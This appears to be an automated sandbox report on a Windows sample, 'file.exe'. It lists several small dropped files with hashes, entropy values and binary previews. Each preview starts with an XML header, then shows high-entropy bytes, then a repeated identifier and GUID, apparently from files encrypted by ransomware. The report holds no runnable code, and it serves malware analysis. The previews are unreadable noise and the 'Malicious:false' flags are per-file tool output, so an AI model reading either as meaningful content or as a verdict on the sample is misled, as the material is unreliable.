          Preview:<?xml.B...g...i"DE.i.o%S...B2..G|.TA:......u9N..Jy....G..+...J..z.Mr'1.......%P`v.q.N.U'X...D..=......9v.p.yP.U]...PPk.R...G).+...%Z...e....&u.0$^..%.r..t...(.1x.]."..=t8|..+..V..G..a_/.sK<.[^1r.h...7.........!..J.\."...]....KD..^.iw(.m..`.*.p.._4..i|).(..)...h|.S/\.E.^M9.tM.....BC.....V.6FQ..._.4+N."b.{..d....|..A.....0Y.a5..-...^2.)......m ...4dS..:.!9d....}K....e2L.SKV.R.<"x._..q...q...=...C.e..s._t+..f...k.G..0.....M.....^.-.6.......fk....P94.A.|..v{...2..>L.....1.....a....m..F...f....vO.......D0.P..P.^....]........D...[....x..6..m..v`.\...4...#.5....n.q]Q.78.J.E%.w..p.`...U]._K..u|#.~....O....d.D<.<U.+l..f'.#..ot.y..../...>....|'..*DC....67....$z...g.....,..b...:......... >.k....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):752
          Entropy (8bit):7.739752131178225
          Encrypted:false
          SSDEEP:12:K8ZQSuhMo9j36P1L9P8qoTEZf26fAXxTO+7a1LyMu5bj4Wo8AVixpZacii9a:ASuhz9bik/T2DeOBUPB42AViTkbD
          MD5:D693671D03B2E2F3D5857B4CD556333C
          SHA1:B4FC1C0F7795D83E49D3604F3780798105924EBD
          SHA-256:C8430E32094A409A3D0FB26D07D415E1240446CAECB1323C9A606521BC497CB6
          SHA-512:F15556D4A8A3280059845D3743C13F6C652B61FF92C1B36B660EAF8989A16785738ABA60FDE0ACFF509DC213627A4B6D3E39FF6D75A0D94D6D46372F49D2A97B
          Malicious:false
          Preview:<?xml<..*........z.J?j`...@oX@.{.............-sV{.....L.6.....u!i\..\.m..#....A......M.Y...C.{t.J....el9zUm....z0d............U.....I.+.7.^.?.r.)M.|.6.~...r..y...#..[}.bn.-...C..?}..p....}3..Vxh.w....>~....7;..2_...\k]r..+'..~..b......R.{....d.h....X.?.n..o..t....3.5.n.`.x...f#.lkf.<?.J..S......H80N\..u.k...0f+>z.w....e..[^v.]jG......@..X.....^...w-,`...-nm....\..a.:Z......1.......y;V.*.....~.....M0\.. ...5...,..~..k....qTV..)...k......CcT..(i...b..H]..%..Y....O....!.1.]'.g.~....".).Q....\r.P..`...V...<.....6q...d..$.M...1S./.$?........;j..49.E.......i#L..dR...W.k..z...E[J#..&b.lr.(.n....u...=....wg.9....4q.B.4.?.&.,A......wI.qYUr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):827
          Entropy (8bit):7.701382336376953
          Encrypted:false
          SSDEEP:12:XtE1WaNptLPJDjuy3HXXoQKI05uWLlg9ixpZacii9a:XwrppPVvKRtLEiTkbD
          MD5:5DCC388F690F423846303A10B327C1F5
          SHA1:039A460EA3277E21529BC680BE6F65072289EF0D
          SHA-256:868B6B588AC08496EB4663FFFD134AB4435749651C172D2F4521391492AA8430
          SHA-512:24BC2F886A09E80EDC8FFEECEC077655A5998FA421E863519B40537173B0D6541CCCBFD3C202EAD3EFEB4AE7D6A95AC36302371909EE9AEC0CEDACC063310086
          Malicious:false
          Preview:<?xml.B3d.....@K.....B*..4.B'.Sc.(.........k...My..G.....@....._.9....{.WLW7.....Y.q.P./...'...U.[..a4..2?..#.(+j.....?i..x.Mo..|.8.g.4....G...A.^1....ZJ#{.."..p...hs>..0O..o...U....{i..U...o.k.r..s.d......wEh...D.v......I...JG..v.6... Z.\....}".:G...3~......i{..SP`...Z<..C.@.^...+`Z!.5.K..k{...j...Q...r{...=.../;"_X....>&@N....i.S.71.2r.>Z.>.N9.F@4[...-..xv.e..K.....}.@.....o..iP.k..Ex.6+s~..u...V..,?jx..@.l.V.?....~qlAs...o..<6...s..D.b...... [[\.....L.F6..Q..YR....aW....):....c..9....Z..Y.&6O&..v0Ldb..y......Fq.,.j.'yj.w..N..D.$..U}..A.... ...t7.-....;N.....?^...N...2*C .o....ZT.......J...[..,.!&..!Xgw.P.s.o.g..gN.q.m.c@..:......[..0S../M...i..p...k}A..Lc...l.........E.~V.8D..L7..u.J]....E.%!4...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):753
          Entropy (8bit):7.6688825091625095
          Encrypted:false
          SSDEEP:12:e3sjaUFW6KYQBY5t3usv+2GQTVvDPw/YCcEqvmwu/VnFehOPghY2ztMT2uzixpZE:e34ds6KvBY5FjGORDw/YlEqvmwu54hO5
          MD5:AB47680A37E7D960804D0C66EC15BF3B
          SHA1:0CF58F01FB27D098C7C9D786B540F39B4DD35813
          SHA-256:95042A345DEC946FE69EA03C10ADDB5AFB964085A9C2EF82F9EF42A9A3E64CC6
          SHA-512:55EF0AAFEAF17F12A1620473BAF9423AD6EA0082BAC75D6A61C17EC85AE2D96F5DA7B346CF5E84F95D8C5EAF5F9CA74402D77DBEDF2281946D22EA18F47FCE68
          Malicious:false
          Preview:<?xml;.)..'........&...-\lr.r.s.k...4....+`.!.V_._...}....[V...)...$2..Y.A/bI..N..p_..`...` .zFO....(d.8/.x.ws.q{5...s..@.w.p...]9..TD....)/.60t...7.r......Pg(.?..C.'..M.#i}.......l...X._X1..k4..B.".rI>.. .<.$.....?....{F..x`U.z...}...5w+.v.Q...1...+.)..DAAJv@Z........E'.#....X.y.k..$....L..-...........QB.3.L\.,;.uu...........k\%<...B.tG.%.......0D1...."F...G..1^....4.i.Z ..P..>.T]..C.)d..*[..!.G.].....D..,M4.PK.......!...W.C-T.=..>..@6...W...../...h.a.;.t..2.g....Yj..I...9.^Q.U%..T,..o.6p..=.......#M&...4........:.].....jzP.;9*..h...w.(P....k.-...I=.LW.......$.}...U)..`.`.....T..]y..)R.r..z]....6v.ea...]4...<.7..M...Q.B,.<B.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):805
          Entropy (8bit):7.720738847802505
          Encrypted:false
          SSDEEP:24:xjxMJjYW2H25yY2XSudmLhKyjWZ2K/iTkbD:xjmV2W5yYxXdKXUiD
          MD5:56105358064444D74CE05B0759509B45
          SHA1:49D18E5307BB26AE3D691EE452ACE02EA1EE531F
          SHA-256:8C8E70043B33C087AEFAA6FD2DCD3BF01815A63DAB0C98983162DE7842551C8B
          SHA-512:6E6357A99CB94163A38EFE09F547E0FAECCD67DB6E7FF0439CB229CF8151DE1CE026161A94F6758BF81664BE8EE2211E9E36C3A9FB3B74B8D923CCCB0DE1D593
          Malicious:false
          Preview:<?xml._0..I...........>R.!o{.=....3....M.R.....9a..a7.?...S..n.:A..o."egt..'W...I.......y.........S.._..<....&.......#..[..=6.$./..5..Y...0...c.......L...Abc...>lmmo............a.P.h.....B...F.r....P..D.u....R..U.M......5..^.Y.X..JW...3v.c-VI.1.U....4..;..R...z..0...y.W..."~.u`ht4...{......@..2 ..V! ..K...6].]...&a.a.1..:G%.....v..jO-..........S.."U_.....6.1....]~.t...".X.X@M..gd....3p.U.....Pd$y~rc&..F...XJuk5$v...G. .FH..4W.YLF...agM..$........E.,........`.[k.rR........m#B<...I....#4Z........E.........(..p.&.+..F.6..!n.8.. .*..A..m.`lC..xc..L?.....>.n.W.=...:..J......s..3.....`.Vr.[...3H./o...}.(.k.......^_...i....!.<.B.....a.N....6...4G./.qP ......M@.l..J<Ib.p..".#cO.J.O....w_h.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):760
          Entropy (8bit):7.692764659472269
          Encrypted:false
          SSDEEP:12:bWpoLLPGCZl4iIJB84HfcxThwjrxSeu+9x71xgftOE+6nfSOKctxKCfgJqLKCdFL:bWGvzIJBBfC1wjAS9x/gfB+8fSYKCCqP
          MD5:7F38E5CEF0260862DDD1898839733545
          SHA1:26E425BD5513C83EB983B5DBA5B95A47A3F22F51
          SHA-256:F9E4BC244F2D06058105B36C3A2EE722CE119DB4D7BF3E27E6AC6A555D26FBF8
          SHA-512:2C20D6775C1B8A25615984AFDDB021FEEB61F814F1A2312289200CC0D7E7C358530ED2062DF33AE9D065B1DE2ABC5B648BDFDC16B57246BEE714B85C4D9E40FD
          Malicious:false
          Preview:<?xml.lL.@d.X=.......b..4..T.J.T..x....K..p..[.S.uc{z...XRN.....O......S..Z..}.q-.>..m]..f&.e..Z9..:..c..3..|9.{....U....$..Y*k.Dn9..."+.....?_.....\2..2.....m+G......r\.. S...'`.n-.I.CP.9...}.O.S/..Z...){h.H...,..._..&...c....O...Oj!...AyBSi.........p_|....7.g-...:...E.Y.H|....]3.{C.2k....B..Wm.....&\.!...~W.#.........Ybt!1..?.....~_[.!..#..P.......X.&(.H.}...A.H....8.....t4.;q..y_`..NX.J...J.l...F.x.].vC[3.M:.i..........3.....S.4.[4.[}j.-.8.f#7Q...Q..Uo..m$.Ih..7?^..1.Jj..f.^...Qe`y.......q...J..JA....K_...[\.....g....(...@7^....?x'...'..^..e{..........d| ..D.4.kB....Gg.#F...y.'.R......q.5.$:....^...J,.K.L.~R ..q.._..0~vc...{..+......... X...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):819
          Entropy (8bit):7.78226496667681
          Encrypted:false
          SSDEEP:24:I6mNZpnOwkEGFaE+mq9DBB1acqvwiTkbD:ipnj9SaENq9dB1a9piD
          MD5:ED5460B0666417B15532296EEA3593D8
          SHA1:8DE9CA6460B4F83A14946EB4F6F9A6891B4DFC81
          SHA-256:DE952850997F46DA4A60C51D72D0D8627534E61DC68F8802D20177D7C8892356
          SHA-512:78267AE54680AF05AD337A17D38DAC275EE2EAC0BDC6C9573854F35B279A0C08BD5FCAD52DC26A736984A4794773D7806A865D6EFD5248B109B36F0AA703CE94
          Malicious:false
          Preview:<?xml5.S.u i....a'....8./.- ~.....&.*e... e[Y...[.%.I..L.a%L.+@r...ZC........}$79.\...1o2..!..n4f...B......dO.:.)...Q8)^...S8..:..a...I.../......%...f..D.v.s"...........)..0X(....x..j,Q..(.~=.?}.........-....d....[.z.Z?.XP..7..c...D .........4.....3.1_..UC...`.......i.hhmKu#.. .R.d.X...$..L....8...g..q....C..!+.0.G..m.....Zk..b...+....j...>.a...H..i.-.c.....4.....=...8.4?....p3F.<..c.w..s.Z:.Z.J@..]Nc.....g...k.rx..Z..i..)...uT.2..6...l=......V)T...AQ..B......:...K.{..+..Dv...+.......[{...4....A~."UaI.1.Oy+..H....f...T....`yRU..)..v......((.x.}.....B`.k.._...s.@......;G..g...2el.....^..+.Do..C..p...[.i<....h^.[..v^.*.[.....o.on...+.-..t......u+..pE.......>....(....j>v..|~@.j5..6=..].{I..xg.!.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):756
          Entropy (8bit):7.651852972185022
          Encrypted:false
          SSDEEP:12:e/DdMGH+2Dz5ryVCcCx/ug2ODpT7pJdTL3+y3sDVmMN4IR3wZyGixpZacii9a:e/hMWzhYKRfRH3r3snRhfGiTkbD
          MD5:E6094CFD81A7366B47F83E64A3FA5CD2
          SHA1:F517DDF37DA5116B8C6290474DEA97634281909C
          SHA-256:AF98BE39EFA836B8CB8DD92967058C324F64F8C0F3F0DD37F0B23367B824B623
          SHA-512:84586DCF5E41E5F42C9C02DB3F18292DE1C07F2AA68C1EBE6C4CA195B2B729F6AE3407146E7E6E6C1B6DE77832E05180358A3699E0003A7D55ADA983A0BFF5ED
          Malicious:false
          Preview:<?xml...~..q.........Ax..O.)a..IF.N DlgAR.-w?.E0.-$....Q...Sc...t...I...H..F.soH.Q...s<...W..I.d Y..`.->.......0'.C.A....(.+I$....,.#..$...-..4U?]I....:...h....L<.h._..".T..c.......{.)#..AK..d(.X.<..i;..b7.....#.U.r.j^.._]sl..0.K.r....l......g/.....L.j4.."....Q...ab_.b.....1.BvH.......9.lS9ghP.+.".S...l....?........ .]Z.. ..[C.k..;...+...g.'.cP4...5Y.d.z....Y4..xX..(....<.......fK[1B.......S@.f...+..a.d.9..H.V.w..nC3v.0v.U*3..;.c.Cf==.t[C...m....M...E..Ek......k...A\$^....?....K.'.)H.H...s.,1l.yP.XWx..q.\..QC(.-A..:....m...G.q.......xw..i...wX..7%...a.n....)'4..m.Z.......D)1...G.^..E.......Hh...`..#o?L...%zB.g..o.. v.72xOJ....K<.....CI...%6.R]sr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):811
          Entropy (8bit):7.710710133228639
          Encrypted:false
          SSDEEP:24:SHtdM7CAHfC5ys9kURQlIoZBI75DHsyHg4OiTkbD:k4HmkNp85T7iD
          MD5:B84E520C8B8139A2CB4B1B81A0CDD521
          SHA1:4B8554C24CD949D231791FB1CFF6C786FEE3F9E1
          SHA-256:F67FAA902BA6D7A9206D63822270835F6B373B2E66CD5627E78FCF6992718260
          SHA-512:D420B87B3E1B693062EB8FCC1F46BA802BAA6633192B91B482D949D828E713DEEB28A6B9DD00C5EF2403ACFFC64CD078C37515BF1B3575698201CAAFA7BF014A
          Malicious:false
          Preview:<?xml.h.V.w..D....r..|..B.g.<...)4.Kw...-.hFZ.$6H.7j..u.m74...V..$.DW.?D.....+...R];....=..$..`%....Q..)D....2I..#..J....a.r.$Tl...g`.D.......*......|...C.]t w._..j.&6......,x.T.Di.....6...<.Imp..I......#.-...u../...D.n.`.>.y....o..O...!Z..z...k.KsM...f..k.8..8..qJ.?Vc.....%..@z.......M...zd4i..I.\,Yp8q.#a,..5..H..5.i.....T.W]..4-m.4_k...l.AU...5....+v..........g..F4-{.y.3l..+.S.....:.].m.'B..[A.....1.5o.!...R.g.........8...1.T....U.*..cu~.(.T...Z ..w..Au....X.5..X....v.,y..._w[.C...~..l.Q...|.J..z..'...n..C..'U.g...V....).:......../...<3.....@..z......a.=..(.k..u4.r.e.n[^..I2.hw{Q.ie.y .LL..aP.R..X#P.\..Z..H.m..\..i....x...J."..[..B..)..ST.4....).h..`.Z.b:...9;.p:.l.2.C...K.....1|r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):737
          Entropy (8bit):7.651469493280256
          Encrypted:false
          SSDEEP:12:D/c47Mrrm3hA9vsm0Mg06gg9T3APH+Fw25fEnpgjiWCr0y+ZQ988Lozx8Mfl3hFW:D/4rrm3hGvsDl06gczh6ujiWCYyctd8h
          MD5:E1B0AA830BAECF96766B23BE7E652F03
          SHA1:386033858F954FC992389877FCAED3DFA6C8CF61
          SHA-256:67AAE90BE1F10025CC077A712822BBFEB70E76951D3AB86F02AA6EE7287A1F77
          SHA-512:425F35C8584E5DFF81949E48FF8D797CC78A1764E0D0D18D0F94F229447151D48D654B030FBDF923D724EF48B77C0AA3E7DEAE5F6756EAEEB286E1D0AEE25B6A
          Malicious:false
          Preview:<?xml....hq.h..xP..h...l........;.C...i..i....%.....i}|q ...I.....$.>Y8D...GQ......CP=.E...#...B;.-G7R`U...Q....... Y.Z^w..|.}.8b..Z....'.\j4.(....o)i......M. ..j..]!.....<]r;.....V.Zv.......Z.....J.jF..O.....3...~..y$..1$..Gm..-.c.e..+p.. .........7..z....Nz.z?t....X..(..'h1e1c.v....I0..."....}...O'.N.....7.B+..G-]..\[S...0......R..A...... ...........[.....)l4.S#d.../..O..o.f6..+..B...<2.%7.*.)Z....,f.....Q..4p.y=TC......!..W..)s..ZF]....qJ....{.k.>.<..mH!.KnV..+.D.PBD..w.6*"}.q..[....a...<a%.9.K...\..........F[..BX+p..B....&..Yv.BJ.U..Z.-..hM.0.I....v$j.J:9H."+....4.!.e...kY..K...r.....6..j.j$c.w...3*...........lr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):801
          Entropy (8bit):7.695858831149483
          Encrypted:false
          SSDEEP:12:BJTKvTJPGfSqSZT5pfxCfIOBc62q/fLu6S3Qa88K0J1p9R1YYpixpZacii9a:rKr86qSt5pfx962Qu6SASYWiTkbD
          MD5:7C00BEF29FE0371AD5E0D433B4E1EC8B
          SHA1:B361C279BCCC9F519ADD1EF2869F6B16A4083949
          SHA-256:A9536CE6793E227469AD9F92ED2567BCFB6768F512900F229E3B46DF9EDB6517
          SHA-512:AB451B47243EE4169D0715F5B0417B1F9F9E1A6F8CE41F676DE4FAB4E2BC4AD7D751795D75AFE0D0722FF62277B7AE4CF32431FB29F26BBB1143B0BE69F52C0B
          Malicious:false
          Preview:<?xml.4.N.D+W0@..F.5....`.....7...D.u.4..9...[8......)NPI,.2...H:.1.......o.cweb..@.%n..}2.x(\..N...xn..nVp...,ty6.......j]h....).PH9...x..Yl.G....r...@..k...=649..5/.f.S...,w|...[..~..+.....`....7.}.....of.....SE.*..4....%..y..GR....S06}~....'.....N(...'..t.+.. .J...Dz..aJ].I.B$...j......2..'.&.P.....UU+$GUKh...H...V..z..5...uU.S..\....s.cU.r&t..0.Y.*..Y-...6s......{..Q..|<.i..i-.....S.......c.nj.......fg...[3BkwP..;...Y!...b.....P.(..[.d."F.8.v.-i.....t......bM.n.JJ...W....3...z.Y{.X..Ce......4!.&.G...{.[....+..)C@.b.4}.4(..Kl.}......yv-"X..........i...p....P...wI....|.`.n..l.$I.e..9.F#r._.......d.....^.F5..k`fZ..Z...|!.:&..:t2.<`..'gpr.o..t.zN.yW...]a...Y?...X.4.~.~.}/;[q.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):733
          Entropy (8bit):7.681105485691058
          Encrypted:false
          SSDEEP:12:EsY/hTWYgjFYDAxEBXXoaxrkpNZPByRY3QRZ0dD7egyFdkqixpZacii9a:ELpKtjyDAxEBXYaG+RY3QrqmjiTkbD
          MD5:28D7CF86457DA20A85ADBBE233906466
          SHA1:A626D24C2B1624071D42E71E36CF2DEC21EC1767
          SHA-256:5101C3009EFC52FFED4F52E0DF6128A35006A9DA11069FE24DB11F25F82C6901
          SHA-512:BED0D84AC26DF902D5B2C5D2FE570B335F3ABEF876802DACF2433E840CBA6EC55C56EA9B8636CD8B19729CAAF330E3AF128FB096DED4700CF219EEBDB0F7F85E
          Malicious:false
          Preview:<?xml..;...B.8....O'NW..v...v.$ ......e..#.C_.b......$.<..\.L...[...v....[..<'..gk.bu...e.%Q..1..zO.f`..\)..F.....7'[M..._^%.....o,.^..A....S._......w..+..{.$p|..GU6k..E...0..&.........wl.k......C|....K...3...a.W.TJ..C.a..K..<......k...k......m..Pj..Z........B..|8...R.;..u..i...h..j...gI~......e...h.....x..F.zY...i...Z...65..P;x.JG......z......j...e...../..&c....W.q..E8.c.I1.C...'.1..P.L.f...R;..QK...x..T.....a..J.f.0.....Y.x...^._..i...7...N.]. .>.:.v5..3..^..P.P..+........1E.!..s.@..OG..-s.... .H.m.....8...H.j..2k...}..Zz.....$y..:&...c..r r...n.s5...S.9.7..=..m.Wu<.;S.0...g........+!:(...m|C.x..q...}..B.J.......r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):812
          Entropy (8bit):7.720879927024998
          Encrypted:false
          SSDEEP:24:kKw6KPp16DqH6vGATqkDYjwS6MheR4rcLXUiTkbD:Qp16qKtAjwSv8RbiD
          MD5:3376E7D766765EE8070E14898F1C0F0E
          SHA1:E5776F8B409FD373043E78FA023865C5730E12E9
          SHA-256:CD3BF4C015525C5932C9D3760562CD4C2DE560C5996406B9BD6A470883408309
          SHA-512:9EFFAE78F070C6B9DD62AD084987916800654B202AEFC83652DC6D745A37EC492E0502DF7A2B81AA41EADF34FD6D2C86736163949BC647D710AD3B9719B9F5A5
          Malicious:false
          Preview:<?xml...V7`.2..B7.Y..K4.....@..*..c"......?>...dX.11..Md..&*.........mo=a<%O.v..a`/`.].@.'$j(.Y...=9..E....la/Z...f}.....E...U....>........X..Jz.... .....?.i{.}...Y..}..~(..).2.azr|..=.\r..7.Y.u.......sok.y..Dr...j..../.a......h.....Z}.B2Zvy....I.P.S..$L.}:....3......t.T!H....n.i....2f.y..r..+..O..I..r.1j. ;...).J.W..zjm!.r.h.....!......e..........0.A.u..-&#`..........`.9...~...a..@.f..^.%.)u .s<.FMX......v./H3B,.r.gz..7...ZH.=z.0K#F..rm.....<J~....aa..|.W&...`.....1a36..CjZnD.E.F...c..|.I.I.z{..bY_....<........@.H.....z.~...Sf..!..1.........Hy.&.D.q{.g.....}R1.6N\...X..Lf+.1....t.-^..E ...*X...]{.........e...|......3o..~..#.H"..,l,...C`..-8|..T..<...)..h.\........Zp{00.R..v...5.k.0N..DA...:.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):758
          Entropy (8bit):7.648143685847707
          Encrypted:false
          SSDEEP:12:YQ5njOyim5f8aKkCGktBIagWnr1S7601yY02JCSYDN2ZWDj2MBnLgOLdNu6jjLXx:YQ5n6kRxktBLgk1R04YROkyj2MdLecj1
          MD5:5649BF562032E1B65601F262CA91DFF3
          SHA1:FEA479905ACEB4C2DBB470B3058021CBB0F882C9
          SHA-256:C1DBECB9089AD431900C81472C50E312C42328EB66DC4DBBB093650D5F3FA4AA
          SHA-512:298FA028BA8C50165BEAEE85E229F7A458D2846B124F36F081F7EBCF9FB1B09B0C604B2A7EF40EBD05BFC346656F9D848642F0976FD5ADE8B8A7503581DAF946
          Malicious:false
          Preview:<?xmleIT.]....v.U..H.j.e8..*.r.`.>....xs.?...gu..[>.....j.c.}....+ll-=9....h.]..)9......\...}..BA...H..I/B..@p..n.T=@..K..w..T...S...=....F-._G....d..U.cy...={.-.B].._.M....X.-..}Ri.9...yJ.\w....K...3*..Ib.78JXt.i....:....G....?.4....I.J3.....o...6.v.c..).g.O.O.p....2...a..t..j.+........wr.#7n.....o(Z%rM...e{.N.....1..Z...St......D.aS.?Dw.S.'..73.......z...b..ga.n..|..q.^.{..w...`..b...!...*?7..E....K..l%r%..._.(.KG..`4M.. .. ....M.9lp..E.I.BO..X.m..U......&..J.T.4...O3f.)$.oH.M..p..9%.=.H4.i..?t.3.)..........q.o.P...PK..<8..@..K.-........>.......a^..+6#.7_2.bb8...........2q:.a.I..s.~M..&E.IE...Jh...|....7...z.i...yo.[.....,..e.W0%...Y.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):808
          Entropy (8bit):7.710465658562909
          Encrypted:false
          SSDEEP:12:BYh9bqKP7KxmnUux257ToUmf+uiYPTIzsvNFm21EmVjnRV+xZ45nwzGixpZaciik:BYh9bqOvUc3UmUzs1Fm2t1g45ZiTkbD
          MD5:ABED47747527D0858B98EE613D69991D
          SHA1:E4723D990F0CCA01E7AE62031D0968D5B33B0F63
          SHA-256:DCFBBB6635DE5A7DC5F30718E6F38C6998CEC41AF39F0962C11240104306CB8E
          SHA-512:5B6C4D6BEFDB9DC4C9AFBDCF44FE11BB4C39A2138C527DA96625E862D14C6FE5A1D5A1EFFCD1405FB263EF84DDE4EE9E93E6F520C58EDA6E81000876F527A503
          Malicious:false
          Preview:<?xml..3..-....J..[=v..[....='.jW..q...W..{i.%d....=..VO....[...D.W.K..uwDa<.!.7.......^...&.LM.0....,...K....`..5m>/X...CI1.Z.'.CV.sv.......6.....`...F.<c.....X..I...N.rW.._..s..'|>e.T+3......4..7..L!c?....?....r...d..7t+.>R...O.L..1<.....c....].p..B.+..O.=7........Cd..'w...#.<7.u....o5_...=.wnVx...Q.v7kl..lI..X..(....+G.g^...r.%`Qi.;0.a....l.....m..n.w.....=Qt..|1^B...z.#..}........s%.a#.C.9"@.+h..G..*}..9.G.z.=\...-uSf.....!"..+Ok.].H..z{:n.o.I.A..yL".2..(.[.{_.J.....@...[.....9......89..m?x.^.....|z.F.`.B...lM.\.f..m.{_...X..g$.@u...Tv*.c.......~....>.(..E.i..R...2.t...@.|..*xtS@.. ...&*.h...w?H}..5.U..m....M.8.2!;...z..D5.......\..V.z..2df.jP.w...B..f%%. ..t`..E..4-...7.|.Qx...B..)$.ikr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):781
          Entropy (8bit):7.703926712358395
          Encrypted:false
          SSDEEP:24:OefPJVsoDve9lWAoKDJOuC/JJfwHiTkbD:OeTLm9mKD3CRFiD
          MD5:4B7E174C1AD8AE308137B360D5F03BB5
          SHA1:9BAB8599915D95C537F46CE810F1F13E50A949D1
          SHA-256:A31B06072BF51CDA66DB8655DA065E8B1945A932037686E10DB6833DC00FD190
          SHA-512:0B99318E7452B0BA9F6910FF7006EC2B69431A32DC4F61057831D11F6F91C50D640ADD151A74E7E2092A0EC024DBC1FE76C8C1EEF97522588A7BFAC9F3FF20BB
          Malicious:false
          Preview:<?xml......E.........MB.5~.m.Qkc..G)....*...d...F5`.g@R/.N..]..Q...(S)<...%..8.r..x$m7.7..UX.e..s.iC...S....E..M5).s(Y.+..h.u..6ZT..h..p_u..E......1.*.M65L;.....$.........K..R9...N.z.wV.....E...J;....'...8....m.f./.y.......I.L.j....u..^.o.'..rIOy.v..Q.$.Hq1.p...Z..o.Y...E...Z.N~..e.^~Ge..%...$t..H(.P..G......V...j..:.A.4....*...^>...}.1.4..d....U.~L..E.wu............ck..k`.j..I.!z.q.*t~....Co........jy.....p....I...R...p.......S....1=.>......kx...P..m...UT.Np.3...l.........g...l*5...'..O.....S...A.:...a`...=..=u2.j..[:dJ...7...D_.f.WR..+>=(.-<..9....a3.C.Ma......E;......3.e|..P.(..vs......f.wx1.v@...:.{........`..lB..|....Ry.Q.B.Pr+{..[Lh..x`.p.)O2r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):824
          Entropy (8bit):7.734824238002395
          Encrypted:false
          SSDEEP:24:YFpAj9Xfq9lEbQNry9VReQ4rlI77ki7sZiTkbD:0pyZCrEbQAVwoliD
          MD5:1E14966DAA32AD974762AF0B414059C2
          SHA1:6D7324994DDB1551C56339BEE8D9FA7F8C136EA2
          SHA-256:15F6FC1D7003CC10D10CD57778E33F560E96F9BEED6884045D932256439498B2
          SHA-512:667D9288856537273880B3B8A52FE5A44A8AAC79CA74FC65A109ABE39A8A07FA18011B5827FC22EF26CEC73DC6BA73ABCEA902C94176101BAEA44A16A0CB9ADC
          Malicious:false
          Preview:<?xml.t..Z..]v.z.XD....3....BB=..xUz.J..{....l..Z..\Y.$...'.|o...b......6.c.....zSt..Hm...q..,..v.O..|.l(...Z'...Y./,...."..#........)....:5&.r.T.w.|.l.{KZQ.e@............x.<.D;CP...-W...Q]c'Sh.....]...C..@#.../.Nn..V..K.n...H.... ;..{...eC.....~..R....l~.V....]...'..u((.m..S.>.k.w....rTl....NK.....e.'&.*.*../B...0...d'..e].....p..374.......c...K%E=x...h.L[q..,.+.9.."#.F.o.+......o.r\.....de..;>.=.q....B8.@6yw*...\N.h...X..D.NK4.|.....d..m.9zmj.$.E...D...x.`....0*I.......T..Q.6..'.....#..FQ..[...E.q.0.u..\..z..<O.2.]6v.v7.......kBg........?...,...h.)...'..?,.W.nG.y..9U....<..\+..H%.{...83....yt..zp.&.........Nv.s.h^.0QZ......25w.Q&>......'U..E../UW.9.#8r.u`.<iC\...,.w9X.4.....QK.}..W.M.y.....L.ss.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):749
          Entropy (8bit):7.638354918349168
          Encrypted:false
          SSDEEP:12:gpi4bF5fFsPwqtBJdCv4C1Q//VhP5trBbyi+EoaagnYH0ixpZacii9a:gptNTqtBJ0vBKNhPVYH0iTkbD
